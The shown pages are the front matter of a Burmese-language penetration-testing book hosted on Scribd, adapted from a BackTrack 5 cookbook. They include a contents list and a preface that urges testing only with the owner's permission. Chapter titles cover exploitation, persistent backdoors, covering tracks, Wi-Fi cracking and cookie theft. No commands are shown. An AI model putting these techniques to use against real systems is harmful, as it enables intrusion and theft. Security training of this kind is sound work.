100% found this document useful (1 vote)
487 views326 pages

YMA (Penetration Methods of Hackers and Preventing Hacking)

This document provides an overview of the contents of a book about using the Linux distribution BackTrack. The book covers installing and customizing BackTrack, information gathering techniques, vulnerability identification and exploitation, privilege escalation, wireless network analysis, password cracking, and forensics. It discusses using BackTrack's built-in tools and features to perform tasks like reconnaissance, vulnerability scanning, exploitation, and intrusion on local and remote networks, along with wireless hacking and password cracking. The book aims to teach readers how to use BackTrack's extensive security-focused tools and help it become their primary operating system for hacking activities.

Uploaded by

zawlwin oo
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
487 views326 pages

YMA (Penetration Methods of Hackers and Preventing Hacking)

This document provides an overview of the contents of a book about using the Linux distribution BackTrack. The book covers installing and customizing BackTrack, information gathering techniques, vulnerability identification and exploitation, privilege escalation, wireless network analysis, password cracking, and forensics. It discusses using BackTrack's built-in tools and features to perform tasks like reconnaissance, vulnerability scanning, exploitation, and intrusion on local and remote networks, along with wireless hacking and password cracking. The book aims to teach readers how to use BackTrack's extensive security-focused tools and help it become their primary operating system for hacking activities.

Uploaded by

zawlwin oo
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 326

TABLE OF CONTENTS

Preface 1

Chapter 1 : Up and Running with BackTrack 7


Introduction 8
Installing BackTrack to a hard disk drive 8
Installing BackTrack to a USB drive with persistent memory 13
Installing BackTrack on VirtualBox 16
Installing BackTrack Using Vmware Tools 21
Fixing the splash screen 23
Changing the root password 23
Starting network services 24
Setting up the wireless network 26

Chapter 2 : Customizing BackTrack 29


Introduction 30
Preparing kernel headers 30
Installing Broadcom drivers 31
Installing and configuration ATI video card drivers 34
Installing and configuration NVIDIA video card drivers 38
Applying updates and configuring extra security tools 41
Setting up ProxyChains 43
Directory encryption 45

i
Chapter 3 : Information Gathering 49
Introduction 50
Service enumeration 50
Determing the network range 54
Identifying active machines 58
Finding open ports 59
Operating system fingerprinting 62
Service fingerprinting 63
Threat assessment with Maltego 65
Mapping the network 70

Chapter 4 : Vulnerability Identification 77


Introduction 78
Installing, configuring, and starting Nessus 79
Nessus – finding local vulnerabilities 82
Nessus – finding network vulnerabilities 86
Nessus – finding linux-specific vulnerabilities 91
Nessus – finding Windows-specific vulnerabilities 95
Installing, configuring, and starting OpenVAS 99
OpenVAS – finding local vulnerabilities 106
OpenVAS – finding network vulnerabilies 112
OpenVAS – finding Linux-specific vulnerabilities 117
OpenVAS – finding Window-specific vulnerabilities 122

Chapter 5 : Exploitation 129


Introduction 130
Implementing exploits from BackTrack 130
Installing and configurating Metasploitable 133
Mastering Armitage – the graphical management tool for Metasploit 138
Mastering the Metasploit Console (MSFCONSOLE) 141

ii
Mastering the Metasploit CLI (MSFCLI) 144
Mastering Meterpreter 148
Metasploitable MySQL 151
Metsaploitable PostgreSQL 154
Metasploitable Tomcat 158
Metasploitable PDF 160
Implementing the browser_autopwn module 163

Chapter 6 : Privilege Escalation 167


Introduction 168
Using impersonating tokens 168
Local privilege escalation attack 171
Mastering the Social-Engineering Toolkit (SET) 172
Collecting victims’ data 179
Cleaning up the tracks 181
Creating a persistent backdoor 183
Man-in-the-middle attack (MITM) 186

Chapter 7 : Wireless Network Analysis 191


Introduction 192
Cracking a WEP wireless network 192
Cracking a WPA/WPA2 wireless network 197
Automating wireless network cracking 200
Accessing clients using a fake AP 203
URL traffic manipulation 206
Port redirection 207
Sniffing network traffic 209
Accessing an e-mail by stealing cookies 214

iii
Chapter 8 : Voice over IP (VoIP) 221
Introduction 222
Using Svmap 223
Finding valid extensions 225
Monitoring, capturing and eavesdropping on VoIP traffic 228
Using VoIPong 232
Mastering UCSniff 234
Mastering Xplico 240
Capturing SIP authentication 242
Mastering VoIP Hopper 244
Causing a denial of service 246
Attacking VoIP uisng Metasploit 247
Sniffing DECT phones 249

Chapter 9 : Password Cracking 253


Introduction 254
Online password attacks 255
Cracking HTTP passwords 259
Gaining router access 263
Password profiling 267
Cracking a Windows password using John the Ripper 274
Using dictionary attacks 275
Using rainbow tables 279
Using NVIDIA Compute Unified Device Architecture (CUDA) 281
Using ATI Stream 284
Physical access attacks 287

iv
Chapter 10 : BackTrack Forensics 289
Introduction 290
Intrusion detection and log analysis 290
Recursive directory encryption/decryption 295
Rescanning for signs of rootkits 300
Recovering data from a problematic source 303
Retrieving a Window password 307
Resetting a Windows-password 311
Looking at the Windows registry entries 313

Conclusion 315

v
အၾကံျပဳခ်က္

BackTrack သည္ Linux အႏြယ္၀င္ Operating System တစ္ခုျဖစ္ၿပီး Server ပိုင္းတြင္


အသံုးမ်ားခဲ့ေသာ Fedora, Red Hat, Suse, Ubuntu စေသာ Linux အမ်ိဳးအစားမ်ားကို ေက်ာ္လြန္၍
Hacking နည္းပညာကိုအသားေပးထားေသာ Tool မ်ားကို အျပည္႕အစံုဆံုးျဖစ္ေအာင္ ထည္႕သြင္းေပးထား
သည္ကို ေတြ႕ရပါသည္။ BackTrack ကို ျမန္မာဘာသာျဖင့္ “ေျခရာေကာက္ျခင္း ” ဟူ၍ဖြ႕ဲ ဆိုႏိုင္သည္႔
အတြက္ လုပ္ေဆာင္ခ်က္ျဖင့္ ကိုက္ညီေသာအမည္ဟုလည္း ဆိုႏိုင္ပါသည္။ အဓိကအားျဖင့္ Version
အမ်ိဳးမ်ိဳးကိုျဖတ္သန္းၿပီးေနာက္တြင္ ေနာက္ဆံုးအေနျဖင့္ Version 5 ကိုေရာက္လာသကဲ့သို႕ ျပင္ဆင္ခ်က္၊
ျဖည္႕စြက္ခ်က္တို႕အေနျဖင့္လည္း Tool မ်ားစြာျဖင့္ အားသစ္ေလာင္းထားသည္ကိုလည္း ေတြ႕ရိွရပါသည္။
ထို႕အျပင္ Hacker ေလာကတြင္ အသံုးအမ်ားဆံုးေသာ က႑မ်ားျဖစ္သည္႕ ေျခရာေကာက္ျခင္း၊ အခ်က္
အလက္မ်ား ရွာေဖြစုေဆာင္းျခင္း၊ အားနည္းခ်က္ယိုေပါက္မ်ားရွာေဖြျခင္း တို႕အျပင္ တိုက္ခိုက္ျခင္း၊ Exploit
မ်ားကိုအသံုးျပဳျခင္း စသည္တို႕မွာလည္း ပိုမိုေကာင္းမြန္လာၿပီး ပိုမို၍လည္း လြယ္ကူလာပါသည္။
အခ်ိဳ႕ေသာ Tool မ်ားတြင္ Graphical User Interface (GUI) Mode ျဖင့္ပင္သံုးစြဲလာႏိုင္ေစပါသည္။
အထက္ပါအျခင္းအရာမ်ားေၾကာင့္ BackTrack သည္ Hacker တို႕၏ Professional Operting
System ပင္ျဖစ္လာၿပီး ႏိုင္ငံတကာတြင္ ေအာင္ျမင္ေသာ OS စနစ္တစ္ခုအျဖစ္ ရပ္တည္ႏိုင္ေစခဲ့ပါသည္။
ထို႕အျပင္ အၿမဲတမ္း Hard Disk တြင္ Install ျပဳလုပ္ထားျခင္းအတြက္သာမက ယာယီအသံုးျပဳႏိုင္ေသာ
Virtual Environment ေပၚတြင္ပါ Install ျပဳလုပ္သံုးစြႏ
ဲ ိုင္ျခင္းသည္လည္း အလြန္ေကာင္းမြန္ေသာ
လုပ္ေဆာင္ခ်က္တစ္ခုျဖစ္လာေစပါသည္။ ယခုစာအုပ္တြင္ BackTrack ကိုအသံုးျပဳ၍ Local Area
Network တြင္သာမက Internet၊ Intranet မ်ားတြင္ပါ ထုိးေဖာက္၀င္ေရာက္ျခင္းမ်ားကို ေလ့လာရပါမည္။
ထို႕အျပင္ Wireless Environment တြင္လည္း Wifi Encrypted Technology မ်ားျဖစ္ေသာ WEP ႏွင့္

vi
WPA/WPA2 စသည္တို႕ကို အသံုးျပဳထားေသာ Network မ်ားကိုပါ ထိုးေဖာက္၀င္ေရာက္၍ Key မ်ားကို
Crack ျပဳလုပ္ျခင္းတို႕ကိုပါ ေဖာ္ျပေပးထားပါသည္။ ထို႕ေၾကာင့္ BackTrack သည္ Hacking ကို
ေလ့လာရာတြင္၊ ထိုးေဖာက္ရာတြင္၊ Hacking ျပဳလုပ္ျခင္းမ်ားကို ကာကြယ္ပိတ္ဆို႕ရာတြင္ ၿပိဳင္ဘက္
မရိွေသာ တစ္ခုတည္းေသာ Operating System တစ္ခုလည္းျဖစ္ပါသည္။
သို႕ရာတြင္ ယခုစာအုပ္ကိုဖတ္ရွဳေလ့လာ အသံုးျပဳလိုသူမ်ားကို အႀကံျပဳခ်က္ ႏွစ္ရပ္ျဖင့္ အၾကံျပဳ
ေပးလိုပါသည္။ ပထမတစ္ခ်က္မွာ ေလ့လာသူမ်ားကိုရည္ရြယ္လိုပါသည္။ Hacking နည္းပညာမ်ားကို
ေလ့လာျခင္းသည္ ထင္ထားသကဲ့သို႕ မလြယ္ကူႏိုင္သည္ကို သိရိွၿပီးျဖစ္မည္ဟုထင္ပါသည္။ ယခုစာအုပ္ကို
ဖတ္ရွဳျခင္းျဖင့္ အခက္အခဲေတြ႕ေစႏိုင္မည္႕ အခ်က္တစ္ခုမွာ စိမ္းေနၿပီး အသံုးျပဳသားမက်ျခင္းပင္ ျဖစ္ပါ
လိမ့္မည္။ အသံုးျပဳသူအမ်ားစုသည္ ကြန္ပ်ဴတာကို စတင္အသံုးျပဳကတည္းက Windows Environment
တြင္သာေလ့လာ က်င္လည္ခဲ့ၾကသည္ျဖစ္၍ Linux အႏြယ္၀င္ BackTrack ကိုအသံုးျပဳရာတြင္ အခက္အခဲ
အနည္းႏွင့္အမ်ား ေတြ႕ႀကံဳရမည္ျဖစ္သည္။ ထိ႕ု ေၾကာင့္ ေလ့လာလိုသူမ်ားအေနျဖင့္ BackTrack ကုိေလ့
လာရာတြင္ အခက္အခဲရိွလာခဲ့ပါက Fedora, Suse, Ubuntu စေသာ Linux OS တစ္ခုခုကုိ ဦးစြာေလ့လာ
သင့္ပါသည္။ ထို႕အျပင္ BackTrack တြင္သံုးႏႈန္းေသာ Technical ေ၀ါဟာရအခ်ိဳ႕သည္ အလြန္ထူးျခား
ဆန္းျပားၿပီး အဓိပၸါယ္ဖြင့္ဆိုရခက္ခဲပါသည္။ ထိုအခါ Hacking ကိုယခုမွစတင္ေလ့လာသူ လူသစ္တန္းမ်ား
အတြက္ နားလည္ႏိုင္ေစမည္မဟုတ္ဘဲ hacking ပညာရပ္မ်ားကို ေၾကာက္ရြံ႕သြားမည္ကို စိုးရိမ္မိပါသည္။
ထိုအခါ စိတ္မပ်က္ေစဘဲ ဇြဲရိွရိွျဖင့္ ေက်ာ္ျဖတ္သြားၾကရန္ အေရးႀကီးပါသည္။ လုပ္ေဆာင္ခ်က္မ်ားသည္
ထူးျခားဆန္းျပား၍ ရုတ္တရက္နားမလည္ႏိုင္ေသာ အေၾကာင္းအရာမ်ားကိုလည္း ထပ္တလဲလဲျပန္လည္
ဖတ္ရွဳ၍ စဥ္းစားရန္လုိအပ္ပါသည္။ Hacking ပညာရပ္သည္ Technical ဆန္ဆန္ လုပ္ေဆာင္ခ်က္ကို
အဓိကထားသည္႕ အခ်က္မ်ားပါရိွသကဲ့သို႕ ကဗ်ာဖြဲ႕ဆိုျခင္း၊ သီခ်င္းမ်ားေရးစပ္ျခင္းသကဲ့သို႕ပင္ အႏုပညာ
ျဖင့္နက္နက္နဲနဲ စဥ္းစားရေသာ က႑မ်ားလည္း ပါ၀င္သည္႕အတြက္ အလြယ္တကူ တတ္ေျမာက္ႏိုင္မႈ
မရိွျခင္းကိုစာဖတ္သူမ်ားသေဘာေပါက္ထားရန္လိုအပ္ပါသည္။ ပထမအခက္အခဲကိုေက်ာ္လႊားရန္ အတြက္
အၾကံျပဳလိုသည္မွာ ဤစာအုပ္ကို မည္သို႕မွ နားမလည္ႏိုင္ပါက ပထမထုတ္ေ၀ၿပီးျဖစ္ေသာ “ Hacker
တိ႕ု ၏ထိုးေဖာက္နည္းမ်ားႏွင့္ Hacker အႏၱရာယ္ကာကြယ္နည္းမ်ား” စာအုပ္ကို ဦးစြာဖတ္ရွဳေစလိုပါသည္။
ထိုစာအုပ္သည္ Hacking ပညာရပ္ကို စတင္ဆည္းပူးလိုသူမ်ားအတြက္ ရည္ရြယ္ေရးသားထား
ေသာေၾကာင့္ ထိုစာအုပ္ပါအေၾကာင္းအရာမ်ားကို ေၾကျငက္စြာနားလည္တတ္ေျမာက္ျခင္းသည္ ယခုစာအုပ္
ပါအေၾကာင္းအရာမ်ားကို နားလည္နိုင္ရန္အတြက္ တစ္စိတ္တစ္ေဒသအားျဖင့္ အကူအညီျဖစ္ေစပါလိမ့္
မည္။ ထိ႕ု အျပင္ ဤစာအုပ္ပါအေၾကာင္းအရာမ်ားကို နားလည္ေစရန္ အကူအညီေပးႏိုင္ေသာ ေနာက္
Source တစ္ခုမွာ Internet ပင္ျဖစ္ပါသည္။ ထို႕ေၾကာင့္ သိရိွလိုေသာ အေၾကာင္းအရာမ်ားကို Search
Engine မ်ားျဖစ္ေသာ Google, Yahoo ႏွင့္ Bing တို႕တြင္ရွာေဖြေလ့လာႏိုင္ပါသည္။ ဤစာအုပ္ပါ
အေၾကာင္းအရာမ်ားကို ႏွံ႕စပ္စြာ သိျမင္ျခင္းျဖင့္ Hacking Ability ကုိေနာက္တစ္ဆင့္တိုးျမွင့္ႏိုင္လိမ့္မည္ဟု
ယံုၾကည္ပါသည္။

vii
ဒုတိယအခ်က္အေနျဖင့္ အႀကံျပဳလိုသည္မွာ စမ္းသပ္သူမ်ားႏွင့္ ကၽြမ္းက်င္တတ္ေျမာက္လာသူမ်ား
ကိုရည္ရြယ္ပါသည္။ Hacker တစ္ေယာက္အဖို႕ အဓိကအခ်က္သည္ Hacking ပညာသည္ သူတစ္ပါးကို
ဒုကၡေပးရန္မဟုတ္ ဟူေသာအခ်က္ပင္ျဖစ္ပါသည္။ စမ္းသပ္စရာမ်ားေပါမ်ားလွေသာ Internet တြင္
စမ္းသပ္ရန္အတြက္ အႏူးအညြတ္ေတာင္းပန္အႀကံျပဳလိုသည္မွာ သူတစ္ပါး၏ ခြင့္ျပဳခ်က္မရိွဘဲ ကိုယ္ေရး
ကိုယ္တာအခ်က္အလက္မ်ားကို ရယူရန္ထိုးေဖာက္ျခင္း၊ သူတစ္ပါး၏ Account သို႕မဟုတ္ Website ကို
စီးပြားေရးအရေသာ္လည္းေကာင္း၊ လူမႈေရးအရေသာ္လည္းေကာင္း နစ္နာပ်က္စီးေစရန္ ရည္ရြယ္ခ်က္ျဖင့္
မတိုက္ခိုက္ၾကပါရန္ ေမတၱာရပ္ခံပါသည္။ လက္နက္ဟူသည္ တိုက္ခိုက္ရန္မဟုတ္ဘဲ ကာကြယ္လိုေသာ
ရည္ရြယ္ခ်က္ျဖင့္ အသံုးျပဳသင့္ပါသည္။ ထိ႕ု ေၾကာင့္ စမ္းသပ္မႈမကင္းေသာ Hacker ေလာကတြင္ မျပဳလုပ္
သင့္၊ မျပဳထိုက္ေသာ အျပဳအမူမ်ိဳးကို ေရွာင္ရွားၾကပါရန္ ထပ္ဆင့္တိုက္တြန္းလိုပါသည္။ White Hacker၊
Back Hacker စသည္ျဖင့္ အမည္မတပ္လိုေသာ္လည္း ေကာင္းျမတ္ေသာ အျပဳအမူမ်ားျဖင့္သာ ျမန္မာႏိုင္ငံ
၏ နည္းပညာေလာကကို ျမွင့္တင္ေပးေစလိုပါသည္။
အခ်ဳပ္အားျဖင့္ဆိုရလွ်င္ နည္းပညာအခက္အခဲေၾကာင့္ေသာ္လည္းေကာင္း၊ မသိမနားလည္မႈ
ေၾကာင့္ ေမးျမန္းလိုလွ်င္လည္းေကာင္း [email protected] တြင္ Email ေပးပို႕၍ ေမးျမန္းႏိုင္ပါ
သည္။ ထိ႕ု အျပင္ Facebook စာမ်က္ႏွာျဖစ္ေသာ https://www.facebook.com/telecomtechnical
training တြင္လည္း ေမးျမန္းႏိုင္ပါသည္။ ထို႕အျပင္ ဤစာအုပ္တြင္ အမွားတစ္စံုတစ္ရာကိုေတြ႕ျမင္ျခင္းျဖင့္
အႀကံျပဳေ၀ဖန္ေဆြးေႏြးမႈမ်ားကိုလည္း ႀကိဳဆိုပါသည္။ အကယ္၍ အမွားမ်ားစြာကို ေတြ႕ရပါက စာေရးသူ၏
ပညာရည္မျပည္႕၀မႈေၾကာင့္သာ ျဖစ္ေသာေၾကာင့္ နားလည္သည္းခံခြင့္လႊတ္ေပးၾကပါရန္ အႏူးအညြတ္
ေတာင္းပန္အပ္ပါသည္။ ဤစာအုပ္ပါအေၾကာင္းအရာမ်ားကို BackTrack 5 Cookbook စာအုပ္ကို
ရည္ညႊန္းကိုးကား ေရးသားပါေၾကာင္း ထပ္ေလာင္း၍ ၀န္ခံအပ္ပါသည္။

ရဲမင္းေအာင္ (RAY – Electronic)


Telecom Technology

viii
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Preface
နိဒါန္း

မ်က္ပြင့္စာေပ 1
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Introduction
BackTrack ဆိုသည္မွာ Linux ကိုအေျခခံထားေသာ ထုိးေဖာက္မႈကိုလုပ္ေဆာင္ေစႏိုင္ေသာ လက္နက္
တိုက္တစ္ခုျဖစ္ၿပီး Hacking ျပဳလုပ္ရန္ စစ္မွန္ေသာ Native Environment တြင္ Asssessment မ်ား
ျပဳလုပ္ရန္ႏွင့္ ကြန္ပ်ဴတာ၏လံုၿခံဳေရးကို အသက္ေမြး၀မ္းေက်ာင္းအျဖစ္ အသံုးခ်ႏုိင္ရန္အထိ လုပ္ကိုင္
ႏိုင္ရန္ ကူညီေပးႏိုင္ပါသည္။ BackTrack သည္ digital မႈခင္းေဗဒႏွင့္ ထိုးေဖာက္ေရးစမ္းသပ္မႈမ်ားကို
ျပဳလုပ္ရန္အတြက္ Debian GNU/Linux distribution တြင္ အေျချပဳထားသည္႕ Distribution တစ္ခုလည္း
ျဖစ္သည္။ ၄င္းကိုရွာေဖြေရးနည္းစနစ္တစ္ခုအရ BackTracking ဟူေသာလုပ္ေဆာင္ခ်က္အရ BackTrack
ဟုေခၚတြင္ေစပါသည္။

ဤစာအုပ္တြင္ အလြန္အသံုးမ်ားေသာ Tool မ်ားကိုအသံုးျပဳကာ အေျခခံ ထုိးေဖာက္မႈ စမ္းသပ္ခ်က္မ်ား


ျဖစ္ေသာ Information Gathering, Vulnerability identification, exploitation, privilege escalation
ႏွင့္ Track မ်ားကို ကာကြယ္ေရးစေသာ လုပ္ေဆာင္ခ်က္မ်ားကို လုပ္ေတြ႕လုပ္ေဆာင္ခ်က္မ်ားစြာျဖင့္
ေရးသားေဖာ္ျပထားပါသည္။

ဤစာအုပ္တြင္ BackTrack 5 ကို Install ျပဳလုပ္ျခင္းႏွင့္စတင္ထားခဲ့ၿပီး စမ္းသပ္ခ်က္မ်ားကို လုပ္ေဆာင္


ရန္အတြက္ Virtual Environment ကို Setting ျပဳလုပ္ျခင္းတို႕ကိုလည္း ေဖာ္ျပထားပါသည္။ ထို႕ေနာက္
တြင္ ထိုးေဖာက္မႈ စမ္းသပ္ခ်က္မ်ား၏ အေျခခံ Principle မ်ားျဖစ္ၾကေသာ Information gathering,
Vulnerability identification ႏွင့္ exploitation စေသာအခန္းမ်ားကိုလည္း ေဖာ္ျပထားပါသည္။ ထို႕ေနာက္
တြင္ ေနာက္ပိုင္းအခန္းမ်ားအျဖစ္ privilege escalation, radio network analysis, Voice over IP
(VoIP), Password cracking ႏွင့္ BackTrack forensics မ်ားအေၾကာင္းကိုလည္း က႑အလိုက္ရွင္းလင္း
ေဖာ္ျပထားပါသည္။ Security Professional မ်ားႏွင့္ လူသစ္တန္းအတြက္ကိုလည္း အေကာင္းဆံုးေသာ
အခ်က္အလက္ပင္ရင္း အျဖစ္ ဤစာအုပ္ကိုျပဳစုထားပါသည္။ ထိ႕ု အျပင္အေသးစိပ္က်ေသာ အဓိပၸါယ္
ဖြင့္ဆိုခ်က္မ်ားႏွင့္ ဥပမာမ်ားသည္လည္း BackTrack 5 ကိုေလ့လာရာတြင္ အခ်ိန္တိုတစ္ခုအတြင္းတြင္
လြယ္ကူစြာ သင္ၾကားတတ္ေျမာက္ေစမည္ျဖစ္သည္။ ထို႕အျပင္ ထိုးေဖာက္မႈ စမ္းသပ္ခ်က္နယ္ပယ္
တြင္လည္း အက်ိဳးရိွစြာအသံုးခ်ႏိုင္ေစရန္ ရည္ရြယ္ထားေသာေၾကာင့္ ဤစာအုပ္သည္ စာဖတ္သူမ်ားကို
တစ္ေထာင့္တစ္ေနရာမွ အက်ိဳးရိွေစလိမ့္မည္ဟု ယံုၾကည္ပါသည္။

2 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

What this book covers


Chapter 1, Up and Running with BackTrack သည္ Testing Environment ေပါင္းစံုတြင္ BackTrack
ကိုမည္ကဲ့သို႕ Set up ျပဳလုပ္ရမည္ကိုေဖာ္ျပေပးၿပီး Network အတြင္းတြင္ အလုပ္လုပ္ေဆာင္ရန္အတြက္
BackTrack ကို မည္ကဲ့သို႕ Configure ျပဳလုပ္ရမည္ကိုလည္း ေဖာ္ျပေပးထားပါသည္။

Chapter 2, Customizing BackTrack တြင္ လူသိမ်ားေသာ Video Card ႏွင့္ Wireless Card အခ်ိဳ႕၏
Driver မ်ားကို Configure ျပဳလုပ္ျခင္းႏွင့္ Install ျပဳလုပ္ျခင္းတို႕ကိုေလ့လာရမည္ျဖစ္သည္။

Chapter 3, Information Gathering တြင္ Malego ႏွင့္ Nmap အပါအ၀င္ Information Gathering
ျပဳလုပ္ေစႏိုင္သည္႕Tool မ်ား၏အသံုးျပဳရပံုမ်ားကို ေလ့လာရပါမည္။

Chapter 4, Vulnerability Identification တြင္ Nessus ႏွင့္ OpenVAS Vulnerability Scanner မ်ားကဲ့
သို႕ေသာ Tool မ်ား၏အသံုးျပဳပံုကိုေဖာ္ျပေပးထားပါသည္။

Chapter 5, Exploitation တြင္ အသံုးမ်ားေသာ Service မ်ားအၾကား Metasploit ကိုအသံုးျပဳ၍ Attack


ျပဳလုပ္ ျခင္းတို႕ကိုရွင္းျပထားပါသည္။

Chapter 6, Privilege Escalation တြင္ Ettercap, SETႏွင့္ Meterpreter ကဲ့သို႕ေသာ Tool မ်ား အသံုးျပဳပံု
ကိုေလ့လာရပါမည္။

Chapter 7, Wireless Network Analysis တြင္ Wireless Network ကို Exploit ျပဳလုပ္ေစမည္႕ Tool
အမ်ိဳးမ်ိဳး၏အသံုးျပဳပံုကို ေဖာ္ျပသြားမည္ျဖစ္ပါသည္။

Chapter 8, Voice over IP (VoIP) တြင္ Wireless Phone မ်ားႏွင့္ VoIP စနစ္မ်ားကို Attack ျပဳလုပ္ရန္
အသံုးျပဳရသည္႕ Tool အမ်ိဳးမ်ိဳးတို႕၏ အေၾကာင္းကို ရွင္းလင္းစြာေရးသားထားပါသည္။

Chapter 9, Password Cracking တြင္ Password Hash မ်ားႏွင့္ User Account မ်ားကို Crack ျပဳလုပ္ႏိုင္
ရန္အသံုး၀င္သည္႕ Tool မ်ားကို ေဖာ္ထုတ္တင္ျပေပးထားပါသည္။

မ်က္ပြင့္စာေပ 3
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Charpter 10, BackTrack Forensics တြင္ Data ႏွင့္ Encryption ကိုျပန္လည္ ရယူရန္အတြက္ အသံုးျပဳရ
သည္႕ Tool မ်ားကို ေဖာ္ျပထားပါသည္။

What you need for this book


ဤစာအုပ္ပါအခန္းမ်ားကို ေလ့လာရန္အတြက္ လံုေလာက္ေသာ RAM, Hard Drive Space ႏွင့္
virtualized testing environment ကိုေမာင္းႏွင္ရန္အတြက္ ေကာင္းမြန္စြာလုပ္ေဆာင္ႏိုင္ေစမည္ ႕
ကြန္ပ်ဴတာတစ္စံုရိွၿပီးျဖစ္သည္ဟု ယူဆပါမည္။ မ်ားစြာေသာ Tool မ်ားသည္ တၿပိဳင္တည္းတြင္ တစ္ခုထက္
ပိုမိုေသာ Virtual Machine မ်ားကို အသံုးျပဳရန္လိုအပ္ပါလိမ့္မည္။ Virtualization tool မ်ား၏အသံုးျပဳပံုကို
Chapter 1, Up and Running with BackTrack အခန္းကို ျပည္႕စံုစြာျဖင့္ အသံုးမ်ားေသာ Operating
System မ်ားတြင္ အသံုးျပဳရပံုကိုေဖာ္ျပထားပါသည္။

Who this book is for


ဤစာအုပ္ကို BackTrack 5 ၏ အသံုးမ်ားေသာ Tool အခ်ိဳ႕၏အသံုးျပဳမႈကို ေလ့လာရန္စိတ္၀င္စားသူ
မည္သူ႕ကိုမဆို ရည္ရြယ္ပါသည္။ သိ႕ု တည္းမဟုတ္ Hacking ျပဳလုပ္ျခင္းကို စိတ္၀င္စားသူမ်ားအေနျဖင့္
လည္းေလ့လာႏိုင္ေစပါသည္။ ဤစာအုပ္တြင္ပါ၀င္ေသာ ေလ့က်င့္ခန္းမ်ားသည္ လူ႕က်င့္၀တ္ကို တန္ဖိုး
ထားေသာ ပညာပိုင္းကိုရည္သန္၍ ဖ်က္လိုဖ်က္ဆီးမလုပ္လိုေသာ လူမ်ားအတြက္သာ ရည္ရြယ္ပါသည္။
ပိုင္ရွင္၏ ခြင့္ျပဳခ်က္မရဘဲ ကြန္ပ်ဴတာကြန္ယက္တစ္ခုကို ထိုးေဖာက္ျခင္း သိ႕ု မဟုတ္ အခ်က္အလက္မ်ား
ရယူျခင္းသည္ ရာဇ၀တ္မႈကိုဦးတည္ၿပီး ေထာင္ဒါဏ္ခ်မွတ္ႏိုင္ေသာ ျပစ္ဒါဏ္ျဖစ္ေၾကာင္း သတိထားပါ။

ဤစာအုပ္ပါအေၾကာင္းအရာမ်ားျဖင့္ မေလ်ာ္မကန္ေသာ သတင္းအခ်က္အလက္မ်ား ရယူျခင္းအတြက္


မည္သည္႕တာ၀န္ကိုမွ် မယူႏိုင္ပါ။ ထိုသ႕ို ေသာအေၾကာင္းမ်ားေၾကာင့္ ဤစာအုပ္ပါအေၾကာင္းအရာမ်ားကို
ကုိယ္ပိုင္ကြန္ပ်ဴတာမ်ား၊ ကြန္ယက္မ်ားတြင္သာ စမ္းသပ္ၾကပါရန္ အေလးအနက္ အႀကံေပးလိုပါသည္။

4 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Reader feedback
စာဖတ္သူမ်ားမွ အျပန္အလွန္ေဆြးေႏြးျခင္းကို ႀကိဳဆိုပါသည္။ ဤစာအုပ္ပါအေၾကာင္းအရာမ်ားကုိ ထင္ျမင္
သံုးသပ္ခ်က္မ်ား၊ ႀကိဳက္ေသာအခ်က္မ်ား၊ မႀကိဳက္ေသာအခ်က္မ်ားကို သိရိွလိုပါသည္။ စာဖတ္သူ၏
တုံ႕ျပန္သံမ်ားသည္ နည္းပညာပိုင္းဆိုင္ရာတိုးတက္ေစရန္ အေထာက္အကူျဖစ္ေစေသာေၾကာင့္ အေရးႀကီး
ပါသည္။

ထိုကဲ့သို႕ အၾကံေပးမႈမ်ားကို လုပ္ေဆာင္ရန္အတြက္ [email protected] သို႕အခ်ိန္မေရြး


ေျပာဆို အႀကံျပဳေ၀ဖန္ႏိုင္ပါသည္။

အကယ္၍ယခုစာအုပ္ပါအေၾကာင္းအရာမ်ားကိုမရွင္းလင္းမႈမ်ား၊ မသဲကြမ
ဲ ႈမ်ားရိွခဲ့ပါကလည္း စာေရးသူ၏
Facebook Account ျဖစ္ေသာ http://www.facebook.com/Telecomtechnicaltraining သို႕စာေရး
သား၍ ရွင္းျပခိုင္းႏိုင္ပါသည္။

Errata
ယခုစာအုပ္ပါ အေၾကာင္းအရာမ်ားကို ေရးသားရာတြင္ အတတ္ႏိုင္ဆံုးအမွားကင္းေစရန္၊ တိက်ေစရန္
ႀကိဳးစားေရးသားခဲ့ေသာ္လည္း အေၾကာင္းတစ္စံုတစ္ရာေၾကာင့္ အမွားမ်ားပါလာႏိုင္ပါသည္။ အကယ္၍
အမွားတစ္စံုတစ္ရာကိုေတြ႕ရိွခဲ့ပါက စာေရးသူ၏ Facebook Account ျဖစ္ေသာ http://www.facebook
.com/telecomtechnicaltraining သို႕အေၾကာင္းၾကားေပးေစလိုပါသည္။ ထိုသို႕အေၾကာင္းၾကားေပးျခင္း
ျဖင့္ ျပန္လည္အမွားျပင္ဆင္ၿပီး ေနာင္ထြက္လာမည္႕ ျပင္ဆင္ျဖည္႕စြက္ခ်က္စာအုပ္မ်ားတြင္ ျပန္လည္
ျပင္ဆင္ေပးႏိုင္မည္ျဖစ္ပါသည္။

ဤစာအုပ္ကို ၀ယ္ယူဖတ္ရွဳသူအားလံုးကို ေက်းဇူးအထူးတင္ရိွပါသည္။

မ်က္ပြင့္စာေပ 5
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

6 မ်က္ပြင့္စာေပ
